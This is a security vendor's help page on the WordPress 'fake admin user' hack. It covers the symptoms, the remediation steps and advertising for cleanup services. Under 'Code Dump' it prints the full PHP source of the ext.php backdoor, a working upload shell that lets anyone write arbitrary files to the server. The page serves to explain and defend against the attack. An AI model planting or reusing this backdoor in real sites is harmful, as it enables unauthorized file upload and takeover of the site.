What is Fake Admin User hack in WordPress? Symptoms & Consequences

This is a WordPress specific attack performed by hackers remotely, infecting your website with malware & file upload backdoors.

  • Multiple admin users added to WordPress (We have users getting added from [email protected])
  • Malicious files with uncommon names added to public_html folder
  • Several files copied to the website
  • New file called ext.php added to /wp-admin folder which lets hackers upload dangerous PHP files to the 'wp-admin directory.
  • Website gets re-infected almost immediately

Code Dump

<?php error_reporting(0);@ini_set("display_errors", 0);$var= $_SERVER['PHP_SELF']."?";$form ='<form enctype="multipart/form-data" action="'.$var.'" method="POST"><input name="uploadFile" type="file"/>
<input type="submit" value="Upload" /></form>';if (!empty($_FILES['uploadFile'])) {$self=dirname(__FILE__);move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);$time=filemtime($self);print "OK";} else {print $form;} ?>

WordPress Admin Panel Hacked? Drop us a message on the chat widget and we’d be happy to help you fix it. Fix WordPress website now.

How to fix the WordPress Admin User Hack

  1. Change all passwords
    1. FTP accounts
    2. MySQL Databases
    3. Server's admin panel account
    4. SSH password/key
    5. E-Mail accounts hosted on the infected server
  2. Delete all anonymous FTP accounts
  3. Investigate server logs to see hack attempts from strange IP addesses
  4. Update the file & folders permission. Set following files to 444 permissions
    • .htaccess
    • wp-config.php
    • index.php
  5. Update file permissions of /wp-content/ & /wp-content/uploads folder to 755 instead of 777 (open for everyone)
  6. Enable IP whitelisting to /wp-admin folder so that only selected IP addresses can access it

WordPress Admin Panel Hacked? Drop us a message on the chat widget and we’d be happy to help you fix it. Fix WordPress website now.

Clean My Hacked Website Now

Website Malware Cleanup Website Malware Cleanup

Have you been hacked? Do you need help with fixing your website? We provide professional malware cleanup services to get your business back online quickly.

Removal of Security Warnings Removal of Security Warnings

If your website is hacked, your visitors may be shown a warning message. Astra will take the necessary steps to remove your website from the blacklists ASAP.

Astra Website Firewall (WAF) Website Firewall (WAF)

Stop future website hacks with Astra WAF & protect your website. No hassle out-of-the-box security tailored to your technology stack & CMSs like WordPress, Magento, Opencart etc.

Real Human Support Real Human Support

Astra's team of security engineers guide you through your security journey. We believe in customers first, so no waiting in long queues to get your queries answered.

This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to [email protected]

Astra Pro Plan
€228/year
Get Started
Malware Cleanup (12h)
Rock-solid Website Firewall
Automatic Malware Scanner
Bad Bot Protection
Blacklist Monitoring
File Upload Scanning
IP & Country Blocking
GDPR Consent Tool